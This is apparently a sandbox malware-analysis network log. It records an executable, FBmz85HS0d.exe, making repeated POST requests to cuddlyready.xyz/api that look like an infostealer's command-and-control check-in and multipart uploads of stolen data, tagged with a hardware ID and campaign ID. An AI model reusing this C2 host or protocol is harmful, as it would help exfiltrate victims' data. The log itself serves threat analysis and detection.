                                                                                                                                                                                        2024-12-23 08:23:31 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                        Content-Length: 53
                                                                                                                                                                                        Host: cuddlyready.xyz
                                                                                                                                                                                        2024-12-23 08:23:31 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                        2024-12-23 08:23:32 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Mon, 23 Dec 2024 08:23:32 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Set-Cookie: PHPSESSID=4mb1sjiabh7rcm82nj41f0pupb; expires=Fri, 18 Apr 2025 02:10:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bSOU%2FICZ823aIXdF6EGlYHj4s2jgZfikwJaE863keNSW1JDwIUGGcllY1Ygj5%2Fk%2F7I%2BhFAdUAC%2F%2ByFH5dRXCUdeniEXTEsI4f0DH%2FQZ%2FDIwzkxhOmkmMiJRDVBAziqHqIKM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 8f66f337d9c70c92-EWR
                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1466&min_rtt=1462&rtt_var=557&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=952&delivery_rate=1947965&cwnd=165&unsent_bytes=0&cid=8b9cb33293b461b9&ts=783&x=0"
                                                                                                                                                                                        2024-12-23 08:23:32 UTC236INData Raw: 63 35 36 0d 0a 75 54 48 47 6c 4e 61 64 45 77 32 38 61 5a 6c 47 58 36 47 57 5a 72 7a 65 6b 73 5a 57 6f 41 39 76 69 53 68 68 4f 41 45 4c 50 7a 76 43 45 37 43 32 37 4b 6b 2f 4c 38 38 4d 75 33 77 72 30 2b 4d 44 6b 50 7a 7a 6f 6e 53 61 61 51 37 6c 57 77 51 55 49 33 31 53 47 59 4e 58 70 2f 69 6c 2b 44 38 76 32 52 47 37 66 41 54 61 74 41 50 53 2f 4b 6a 6b 4d 38 70 74 44 75 56 4b 41 46 4e 75 65 31 4e 59 30 56 32 68 2f 4c 50 2b 64 32 7a 51 42 50 77 6a 4f 73 44 38 43 4e 57 7a 2b 71 74 30 6a 43 30 4b 38 77 70 62 47 6b 78 75 53 31 72 30 55 4c 58 2f 39 4f 41 2f 64 70 34 4d 39 32 52 6c 67 2f 63 44 33 72 4c 30 6f 6a 33 49 5a 77 66 74 53 77 56 53 63 57 4a 5a 55 39 46 54 6f 76 32 35 39 32 4e 68 32 67 50 33 4a 54 44
                                                                                                                                                                                        Data Ascii: c56uTHGlNadEw28aZlGX6GWZrzeksZWoA9viShhOAELPzvCE7C27Kk/L88Mu3wr0+MDkPzzonSaaQ7lWwQUI31SGYNXp/il+D8v2RG7fATatAPS/KjkM8ptDuVKAFNue1NY0V2h/LP+d2zQBPwjOsD8CNWz+qt0jC0K8wpbGkxuS1r0ULX/9OA/dp4M92Rlg/cD3rL0oj3IZwftSwVScWJZU9FTov2592Nh2gP3JTD
                                                                                                                                                                                        2024-12-23 08:23:32 UTC1369INData Raw: 41 74 45 71 65 75 2b 6a 6b 62 49 49 2b 50 2b 68 62 45 6b 39 75 65 56 73 5a 78 42 32 39 74 72 50 7a 4d 54 65 65 41 2f 63 71 4f 4d 44 37 41 39 2b 38 34 71 73 30 77 57 55 46 37 30 41 4d 56 57 78 6e 56 31 37 54 57 71 50 35 73 2f 64 33 59 4e 31 4c 74 57 51 36 32 37 52 63 6e 70 7a 67 70 7a 66 57 59 42 79 72 56 55 31 44 49 32 35 52 47 59 4d 54 6f 76 69 31 38 6e 46 39 31 67 44 77 49 53 2f 49 2f 51 6e 54 76 50 32 75 4f 38 46 74 43 75 46 41 44 46 42 6e 5a 46 42 66 32 31 50 6b 75 50 54 34 61 53 2b 47 53 39 67 68 4c 63 54 34 45 70 79 47 73 4c 74 36 32 79 30 4b 35 77 70 62 47 6d 74 73 58 6c 72 51 58 4b 66 2b 76 2b 31 78 66 64 67 47 2f 6a 59 37 78 76 6f 4f 33 61 37 36 71 6a 4c 42 5a 41 62 69 54 77 52 65 49 79 63 64 58 73 4d 54 2f 4c 61 56 38 6e 70 6a 31 42 7a 37 5a 43
                                                                                                                                                                                        Data Ascii: AtEqeu+jkbII+P+hbEk9ueVsZxB29trPzMTeeA/cqOMD7A9+84qs0wWUF70AMVWxnV17TWqP5s/d3YN1LtWQ627RcnpzgpzfWYByrVU1DI25RGYMTovi18nF91gDwIS/I/QnTvP2uO8FtCuFADFBnZFBf21PkuPT4aS+GS9ghLcT4EpyGsLt62y0K5wpbGmtsXlrQXKf+v+1xfdgG/jY7xvoO3a76qjLBZAbiTwReIycdXsMT/LaV8npj1Bz7ZC
                                                                                                                                                                                        2024-12-23 08:23:32 UTC1369INData Raw: 30 71 37 38 72 6a 4c 4e 59 41 47 72 42 45 4e 64 65 79 6b 46 47 66 46 51 73 50 57 2b 76 55 52 73 30 41 58 38 4d 6e 33 63 75 68 32 65 75 2f 7a 6b 62 49 4a 67 44 4f 4e 4d 45 56 56 75 61 6c 4e 58 31 46 61 72 2f 72 54 2f 66 47 72 61 41 50 41 6e 4d 4d 66 6d 44 74 36 30 39 61 55 2b 79 43 31 44 71 30 30 62 47 6a 73 70 62 45 37 51 45 5a 48 31 75 76 46 32 65 5a 34 55 74 54 31 39 78 50 68 45 68 76 7a 39 72 44 48 48 59 67 7a 68 52 41 5a 51 62 32 46 54 57 73 6c 63 6f 50 61 34 39 33 74 69 30 41 2f 7a 4c 54 62 49 38 67 54 66 74 72 44 71 64 4d 56 31 54 62 4d 4b 4e 31 31 76 5a 46 49 62 37 6c 43 71 2b 4c 50 70 4d 58 43 51 45 72 73 6a 4d 59 4f 73 52 4e 4b 31 38 4b 38 2b 78 6d 30 4b 35 6b 38 41 58 57 42 6b 57 6c 50 56 56 4b 44 36 76 66 4a 33 62 39 6b 50 2f 6a 59 34 79 76 67
                                                                                                                                                                                        Data Ascii: 0q78rjLNYAGrBENdeykFGfFQsPW+vURs0AX8Mn3cuh2eu/zkbIJgDONMEVVualNX1Far/rT/fGraAPAnMMfmDt609aU+yC1Dq00bGjspbE7QEZH1uvF2eZ4UtT19xPhEhvz9rDHHYgzhRAZQb2FTWslcoPa493ti0A/zLTbI8gTftrDqdMV1TbMKN11vZFIb7lCq+LPpMXCQErsjMYOsRNK18K8+xm0K5k8AXWBkWlPVVKD6vfJ3b9kP/jY4yvg
                                                                                                                                                                                        2024-12-23 08:23:32 UTC191INData Raw: 72 4a 30 33 53 4d 55 71 30 30 50 47 6a 73 70 56 46 44 4a 58 61 72 2f 75 66 6c 35 61 4e 41 47 38 43 49 32 78 50 4d 43 30 37 54 39 6f 54 66 44 61 51 66 35 53 51 68 51 62 6d 4d 64 46 35 74 55 76 4c 62 73 76 31 5a 6a 39 78 76 67 4e 69 75 44 36 30 72 48 2f 50 65 6f 64 4a 6f 74 44 75 52 44 44 46 4a 72 5a 6c 4a 64 31 56 57 69 2b 37 48 77 65 33 33 57 42 66 59 76 4d 73 6a 6d 42 4e 4f 34 2f 4b 41 38 79 57 64 4e 70 51 6f 45 51 69 4d 78 48 57 7a 57 58 4b 54 31 6f 72 39 75 49 63 64 4c 2f 43 68 39 6d 37 51 49 30 4c 7a 2f 71 44 6a 4a 5a 51 7a 6e 52 41 52 66 61 6d 46 56 53 39 0d 0a
                                                                                                                                                                                        Data Ascii: rJ03SMUq00PGjspVFDJXar/ufl5aNAG8CI2xPMC07T9oTfDaQf5SQhQbmMdF5tUvLbsv1Zj9xvgNiuD60rH/PeodJotDuRDDFJrZlJd1VWi+7Hwe33WBfYvMsjmBNO4/KA8yWdNpQoEQiMxHWzWXKT1or9uIcdL/Ch9m7QI0Lz/qDjJZQznRARfamFVS9
                                                                                                                                                                                        2024-12-23 08:23:32 UTC1369INData Raw: 31 30 37 30 0d 0a 70 58 72 50 65 36 38 48 42 72 32 77 37 2f 49 7a 6e 46 2b 30 53 51 2f 50 65 38 64 4a 6f 74 49 73 78 2f 51 58 74 5a 4b 55 49 58 77 68 4f 6a 2b 76 53 6e 4d 57 50 64 42 2f 4d 72 4f 38 72 34 44 74 65 33 2f 4b 38 77 7a 6d 51 49 37 55 73 47 58 32 4a 74 55 56 50 64 55 4b 66 35 75 2f 42 35 4c 35 42 4c 2f 44 78 39 6d 37 51 68 79 62 66 2b 6f 6e 54 64 49 78 53 72 54 51 38 61 4f 79 6c 52 55 4e 31 56 6f 66 71 31 2b 58 6c 71 31 67 2f 36 49 6a 76 41 2b 77 44 62 76 66 2b 67 4f 4d 78 6e 44 4f 70 47 43 46 56 6f 62 42 30 58 6d 31 53 38 74 75 79 2f 51 47 7a 49 48 4f 73 6f 66 64 79 36 48 5a 36 37 2f 4f 52 73 67 6d 77 66 34 55 41 4e 58 32 78 73 58 6c 62 63 58 71 4c 36 76 76 5a 35 61 64 45 43 36 53 63 78 7a 66 4d 4b 30 72 4c 39 72 6a 66 50 4c 55 4f 72 54 52 73
                                                                                                                                                                                        Data Ascii: 1070pXrPe68HBr2w7/IznF+0SQ/Pe8dJotIsx/QXtZKUIXwhOj+vSnMWPdB/MrO8r4Dte3/K8wzmQI7UsGX2JtUVPdUKf5u/B5L5BL/Dx9m7Qhybf+onTdIxSrTQ8aOylRUN1Vofq1+Xlq1g/6IjvA+wDbvf+gOMxnDOpGCFVobB0Xm1S8tuy/QGzIHOsofdy6HZ67/ORsgmwf4UANX2xsXlbcXqL6vvZ5adEC6ScxzfMK0rL9rjfPLUOrTRs
                                                                                                                                                                                        2024-12-23 08:23:32 UTC1369INData Raw: 56 4c 55 56 62 62 36 75 75 31 30 66 63 78 4c 74 57 51 36 32 37 52 63 6e 6f 72 33 74 43 54 42 4c 7a 7a 39 53 52 56 52 62 6d 55 64 52 70 56 4b 35 50 47 34 76 79 6b 76 32 41 54 79 4a 7a 4c 43 2f 51 6a 54 75 66 6d 68 4e 63 52 70 42 2b 46 4b 42 56 78 69 62 46 64 61 32 6c 6d 74 38 62 7a 34 63 6e 32 65 52 62 73 6a 4a 59 4f 73 52 50 65 37 34 71 6f 6b 67 6e 4a 44 38 67 6f 45 56 69 4d 78 48 56 33 52 58 4b 44 78 75 50 6c 30 61 64 4d 4b 39 43 55 39 7a 50 41 50 31 37 72 78 71 54 48 50 61 52 2f 68 51 51 78 57 61 6d 56 51 47 5a 55 54 6f 2b 37 30 70 7a 46 65 30 77 58 31 49 79 75 44 36 30 72 48 2f 50 65 6f 64 4a 6f 74 44 4f 64 46 41 46 56 67 61 6c 78 54 79 55 47 6f 2f 37 7a 36 66 57 54 51 44 65 6b 69 4d 73 72 33 42 39 65 37 2b 4b 67 2b 77 57 70 4e 70 51 6f 45 51 69 4d 78
                                                                                                                                                                                        Data Ascii: VLUVbb6uu10fcxLtWQ627Rcnor3tCTBLzz9SRVRbmUdRpVK5PG4vykv2ATyJzLC/QjTufmhNcRpB+FKBVxibFda2lmt8bz4cn2eRbsjJYOsRPe74qokgnJD8goEViMxHV3RXKDxuPl0adMK9CU9zPAP17rxqTHPaR/hQQxWamVQGZUTo+70pzFe0wX1IyuD60rH/PeodJotDOdFAFVgalxTyUGo/7z6fWTQDekiMsr3B9e7+Kg+wWpNpQoEQiMx
                                                                                                                                                                                        2024-12-23 08:23:32 UTC1369INData Raw: 72 6b 38 62 69 2f 4b 53 2f 59 41 76 30 6a 4f 38 33 6d 41 64 69 7a 2f 36 30 39 78 6d 55 4f 36 30 34 48 58 57 5a 71 55 56 4c 63 55 4b 76 79 76 66 46 34 59 4a 35 46 75 79 4d 6c 67 36 78 45 2f 36 66 7a 71 44 6d 43 63 6b 50 79 43 67 52 57 49 7a 45 64 56 64 56 57 70 50 79 79 2b 33 52 70 31 41 37 37 4c 7a 37 4d 38 41 4c 61 73 2f 43 76 50 63 4e 72 43 4f 46 42 42 56 64 67 62 31 73 5a 6c 52 4f 6a 37 76 53 6e 4d 55 2f 46 42 76 63 6a 66 64 79 36 48 5a 36 37 2f 4f 52 73 67 6d 59 42 37 30 30 44 56 32 42 68 57 46 33 52 56 71 54 2b 70 76 64 78 61 4d 77 5a 2b 79 30 34 7a 2f 63 45 32 72 72 35 6f 6a 66 47 4c 55 4f 72 54 52 73 61 4f 79 6c 77 56 64 78 36 6f 2b 33 30 34 44 39 32 6e 67 7a 33 5a 47 57 44 39 51 2f 55 73 2f 32 6e 4d 73 46 6d 43 4f 46 4c 42 46 4a 75 65 31 35 57 31
                                                                                                                                                                                        Data Ascii: rk8bi/KS/YAv0jO83mAdiz/609xmUO604HXWZqUVLcUKvyvfF4YJ5FuyMlg6xE/6fzqDmCckPyCgRWIzEdVdVWpPyy+3Rp1A77Lz7M8ALas/CvPcNrCOFBBVdgb1sZlROj7vSnMU/FBvcjfdy6HZ67/ORsgmYB700DV2BhWF3RVqT+pvdxaMwZ+y04z/cE2rr5ojfGLUOrTRsaOylwVdx6o+304D92ngz3ZGWD9Q/Us/2nMsFmCOFLBFJue15W1
                                                                                                                                                                                        2024-12-23 08:23:32 UTC109INData Raw: 30 70 7a 45 6f 33 52 6e 70 49 6a 37 56 39 30 50 67 67 74 65 79 50 73 56 39 43 76 78 46 51 78 51 6a 5a 68 30 42 34 68 4f 74 38 61 2f 75 5a 32 4c 4f 44 4c 73 62 63 34 50 73 52 49 62 38 78 61 63 36 7a 47 6f 62 2b 67 63 6b 54 47 6c 75 54 56 37 4d 58 4f 53 34 39 50 6b 78 4e 34 31 46 75 79 41 73 67 36 78 55 6a 4f 65 6c 39 32 0d 0a
                                                                                                                                                                                        Data Ascii: 0pzEo3RnpIj7V90PggteyPsV9CvxFQxQjZh0B4hOt8a/uZ2LODLsbc4PsRIb8xac6zGob+gckTGluTV7MXOS49PkxN41FuyAsg6xUjOel92
                                                                                                                                                                                        2024-12-23 08:23:32 UTC1369INData Raw: 38 30 39 0d 0a 4f 53 50 78 4b 6c 55 30 4e 4d 49 7a 45 50 46 35 74 42 35 4b 37 30 75 48 4a 39 7a 41 33 34 4d 6a 36 45 79 6a 72 35 70 76 32 69 49 39 4e 54 4d 2b 78 51 44 6c 78 30 65 42 46 4d 32 46 32 71 38 61 4b 2f 50 79 2f 52 53 36 4d 64 66 59 75 30 4f 35 44 38 36 4f 52 73 67 6c 67 4f 35 55 51 45 54 48 49 6b 65 6b 50 57 56 62 50 6e 39 4c 45 78 61 5a 35 54 71 32 70 39 78 2b 56 45 68 75 79 69 2f 32 47 52 4f 6c 32 35 56 55 31 44 49 33 38 64 41 59 6b 64 35 4f 54 30 70 7a 45 6f 33 52 6e 70 49 6a 37 56 39 30 50 67 67 74 36 6a 4d 73 64 71 48 61 6c 6b 43 45 35 6b 4b 52 4d 5a 31 42 50 38 7a 2f 53 33 4d 56 43 51 53 2b 4e 6b 5a 59 50 42 42 39 43 79 39 37 49 6c 6a 30 4d 4b 37 55 38 45 53 69 46 48 56 6b 33 63 45 2b 71 32 73 72 38 70 50 35 42 4c 2f 7a 56 39 6d 36 52 57
                                                                                                                                                                                        Data Ascii: 809OSPxKlU0NMIzEPF5tB5K70uHJ9zA34Mj6Eyjr5pv2iI9NTM+xQDlx0eBFM2F2q8aK/Py/RS6MdfYu0O5D86ORsglgO5UQETHIkekPWVbPn9LExaZ5Tq2p9x+VEhuyi/2GROl25VU1DI38dAYkd5OT0pzEo3RnpIj7V90Pggt6jMsdqHalkCE5kKRMZ1BP8z/S3MVCQS+NkZYPBB9Cy97Ilj0MK7U8ESiFHVk3cE+q2sr8pP5BL/zV9m6RW


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        2192.168.2.749701172.67.150.1734437312C:\Users\user\Desktop\FBmz85HS0d.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-12-23 08:23:34 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=6QLOBSPXZT92PZ4HKW
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                        Content-Length: 12850
                                                                                                                                                                                        Host: cuddlyready.xyz
                                                                                                                                                                                        2024-12-23 08:23:34 UTC12850OUTData Raw: 2d 2d 36 51 4c 4f 42 53 50 58 5a 54 39 32 50 5a 34 48 4b 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 41 32 39 42 41 46 35 45 41 43 46 35 46 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 36 51 4c 4f 42 53 50 58 5a 54 39 32 50 5a 34 48 4b 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 51 4c 4f 42 53 50 58 5a 54 39 32 50 5a 34 48 4b 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54
                                                                                                                                                                                        Data Ascii: --6QLOBSPXZT92PZ4HKWContent-Disposition: form-data; name="hwid"9AA29BAF5EACF5F1AC8923850305D13E--6QLOBSPXZT92PZ4HKWContent-Disposition: form-data; name="pid"2--6QLOBSPXZT92PZ4HKWContent-Disposition: form-data; name="lid"LOGS11--LiveT
                                                                                                                                                                                        2024-12-23 08:23:35 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Mon, 23 Dec 2024 08:23:35 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Set-Cookie: PHPSESSID=umnmm2rnoesb0glhbbcjiqeqv3; expires=Fri, 18 Apr 2025 02:10:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7gpE6XYlWUQ1H1TqfbYE2WWVImoseAsUYHo2BZK%2BKE6t6NyQ%2FvjFPOI4DZcroo055P0p0o2kTX334yhTmCDZ%2BZrGrFK5A8B1A4eSbpUFvoSNtT7e3pgf2A7GUi6eP9dneOk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 8f66f3481ffd5e71-EWR
                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1680&min_rtt=1645&rtt_var=642&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13789&delivery_rate=1775075&cwnd=238&unsent_bytes=0&cid=09c28c41f45b685c&ts=994&x=0"
                                                                                                                                                                                        2024-12-23 08:23:35 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                        2024-12-23 08:23:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        3192.168.2.749703172.67.150.1734437312C:\Users\user\Desktop\FBmz85HS0d.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-12-23 08:23:36 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=OIEL5BSFKMMBH6W
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                        Content-Length: 15064
                                                                                                                                                                                        Host: cuddlyready.xyz
                                                                                                                                                                                        2024-12-23 08:23:36 UTC15064OUTData Raw: 2d 2d 4f 49 45 4c 35 42 53 46 4b 4d 4d 42 48 36 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 41 32 39 42 41 46 35 45 41 43 46 35 46 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4f 49 45 4c 35 42 53 46 4b 4d 4d 42 48 36 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 49 45 4c 35 42 53 46 4b 4d 4d 42 48 36 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                                                                                                        Data Ascii: --OIEL5BSFKMMBH6WContent-Disposition: form-data; name="hwid"9AA29BAF5EACF5F1AC8923850305D13E--OIEL5BSFKMMBH6WContent-Disposition: form-data; name="pid"2--OIEL5BSFKMMBH6WContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                                                                                                                                        2024-12-23 08:23:37 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Mon, 23 Dec 2024 08:23:37 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Set-Cookie: PHPSESSID=agiou0d2mj3pch27qve1gkjuhk; expires=Fri, 18 Apr 2025 02:10:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A35f5btv%2FOzXcCr%2BnpcqRufESmE61RPYKDxkd3IQypOptyY1IlU6zjikKPjxOhMquMYZolLCZcfLL%2BhFejj5f73DvJwtob%2BW33u4kCfweh459KV%2B%2FJRHal27p%2Bv3Poactdk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 8f66f3567ecc0f69-EWR
                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1501&min_rtt=1501&rtt_var=564&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2835&recv_bytes=16000&delivery_rate=1936339&cwnd=250&unsent_bytes=0&cid=b4de541d8c2d0618&ts=958&x=0"
                                                                                                                                                                                        2024-12-23 08:23:37 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                        2024-12-23 08:23:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        4192.168.2.749709172.67.150.1734437312C:\Users\user\Desktop\FBmz85HS0d.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-12-23 08:23:38 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=Z8U6FMPNN7YKQ3BQ
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                        Content-Length: 20395
                                                                                                                                                                                        Host: cuddlyready.xyz
                                                                                                                                                                                        2024-12-23 08:23:38 UTC15331OUTData Raw: 2d 2d 5a 38 55 36 46 4d 50 4e 4e 37 59 4b 51 33 42 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 41 32 39 42 41 46 35 45 41 43 46 35 46 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 5a 38 55 36 46 4d 50 4e 4e 37 59 4b 51 33 42 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 5a 38 55 36 46 4d 50 4e 4e 37 59 4b 51 33 42 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
                                                                                                                                                                                        Data Ascii: --Z8U6FMPNN7YKQ3BQContent-Disposition: form-data; name="hwid"9AA29BAF5EACF5F1AC8923850305D13E--Z8U6FMPNN7YKQ3BQContent-Disposition: form-data; name="pid"3--Z8U6FMPNN7YKQ3BQContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic
